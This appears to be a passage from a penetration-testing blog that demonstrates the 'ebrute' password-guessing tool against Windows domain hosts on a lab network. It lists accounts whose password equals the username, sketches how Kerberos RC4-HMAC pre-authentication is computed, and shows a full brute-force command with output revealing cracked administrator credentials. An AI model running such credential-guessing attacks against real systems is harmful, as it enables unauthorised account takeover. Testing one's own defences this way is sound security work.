HOST: '192.168.8.88' | USER: 'PAYNE.JAY' | PASS: 'PAYNE.JAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HAWKINS.OSCAR' | PASS: 'HAWKINS.OSCAR' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HAWKINS.OSCAR' | PASS: 'HAWKINS.OSCAR' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CUNNINGHAM.RONNIE' | PASS: 'CUNNINGHAM.RONNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.ROBERT' | PASS: 'ANDREWS.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.MICHAEL' | PASS: 'ANDREWS.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.DAVID' | PASS: 'ANDREWS.DAVID' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDREWS.WILLIAM' | PASS: 'ANDREWS.WILLIAM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GREENE.PAUL' | PASS: 'GREENE.PAUL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GREENE.DANIEL' | PASS: 'GREENE.DANIEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LAWSON.ALVIN' | PASS: 'LAWSON.ALVIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LAWSON.TIM' | PASS: 'LAWSON.TIM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GILBERT.MARK' | PASS: 'GILBERT.MARK' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DEAN.GORDON' | PASS: 'DEAN.GORDON' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MCCOY.BRIAN' | PASS: 'MCCOY.BRIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'STEELE.EDWIN' | PASS: 'STEELE.EDWIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SIMON.FRED' | PASS: 'SIMON.FRED' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HUBBARD.LUTHER' | PASS: 'HUBBARD.LUTHER' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'FLYNN.ADRIAN' | PASS: 'FLYNN.ADRIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MORROW.CLIFFORD' | PASS: 'MORROW.CLIFFORD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MORROW.CLIFFORD' | PASS: 'MORROW.CLIFFORD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ALLISON.BRUCE' | PASS: 'ALLISON.BRUCE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BRENNAN.TRACY' | PASS: 'BRENNAN.TRACY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SHANNON.BEN' | PASS: 'SHANNON.BEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ROCHA.RAY' | PASS: 'ROCHA.RAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ROCHA.RAY' | PASS: 'ROCHA.RAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'VILLA.ROGER' | PASS: 'VILLA.ROGER' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'FARLEY.ROSS' | PASS: 'FARLEY.ROSS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LEARY.BEN' | PASS: 'LEARY.BEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MARION.ADAM' | PASS: 'MARION.ADAM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success'


You now have many more user accounts to guess passwords for.

Kerberos Authentication
Kerberos authentication was undertaken establishing the cipher suites supported by each version of windows and reading of the RFCs.

Lots of different cipher suites are supported:
  • AES256-CTS-HMAC-SHA1-96
  • AES128-CTS-HMAC-SHA1-96
  • RC4-HMAC
  • DES-CBC-MD5
  • DES-CBC-CRC
Send an AS-REQ using one of the ciphers above
  • RC4-HMAC supported across Windows 2000/2003/2008
  • K = MD4 the user password (NTLM)
  • K1 = HMAC-MD5(K, MessageType)
  • Checksum = HMAC-MD5(K1,Timestamp)
  • K3 = HMAC-MD5(K1,Checksum)
  • EncryptedTimestamp = RC4(Timestamp,K3)
  • Request includes a concatenation of the Checksum and EncryptedTimestamp
An example below demonstrates the kerberos authentication plugin:

C:\tools\dev\br>ebrute -r kerbauth -u abc,administrator,test -j -n -P c:\tools\wl\std.txt -h 192.168.8.23 -e win2k3r2dom
ain -t 32
ebrute v0.76 - Edward Torkington
Loading passes...
Parsing passes...
Added:    3 user(s), 28,881 password(s), 1 host(s),  + joeycheck  + blankcheck 86,649 tasks over 32 thread/s.
Starting: 06/12/2011 15:46:12
[21]  HOST: '192.168.8.23' | USER: 'administrator' | PASS: 'Passw0rd123' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[13]  HOST: '192.168.8.23' | USER: 'test' | PASS: 'password' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
Complete: 06/12/2011 15:46:37
Stats:    00:00:25    (~136,486 tasks/minute) (Performed 56,918 / 86,649 tasks)


Summary of Authentication Successes:
HOST: '192.168.8.23' | USER: 'administrator' | PASS: 'Passw0rd123' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'test' | PASS: 'password' | EXTRA: 'win2k3r2domain' | Return code: 'Success'

Of course you could also use LDAP, SMB and FTP but kerberos is a lot quicker.
NB: The kerberos authentication plugin only runs over UDP at the moment and as such if you are getting errors you will have to resort to one of the other plugins. The kerberos enumeration plugin runs over both UDP and TCP with the former being quickest.
Posted by at No comments:
Links to this post
Subscribe to: Posts (Atom)